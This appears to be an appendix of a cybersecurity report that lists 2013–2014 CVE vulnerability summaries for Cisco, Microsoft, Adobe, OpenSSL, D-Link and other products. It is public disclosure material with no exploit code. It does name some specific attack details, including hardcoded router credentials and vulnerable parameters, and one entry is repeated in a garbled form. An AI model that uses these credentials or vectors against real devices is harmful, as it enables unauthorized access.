CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1 and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1 and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster Page 22 of 28
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X, and before 11.2.202.341 on Linux; Adobe AIR before 4.0.0.1628 on Android; Adobe AIR SDK before 4.0.0.1628; and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X, and before 11.2.202.378 on Linux; Adobe AIR before 14.0.0.110; Adobe AIR SDK before 14.0.0.110; and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X, and before 11.2.202.378 on Linux; Adobe AIR before 14.0.0.110; Adobe AIR SDK before 14.0.0.110; and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X, and before 11.2.202.418 on Linux; Adobe AIR before 15.0.0.356; Adobe AIR SDK before 15.0.0.356; and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed .3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
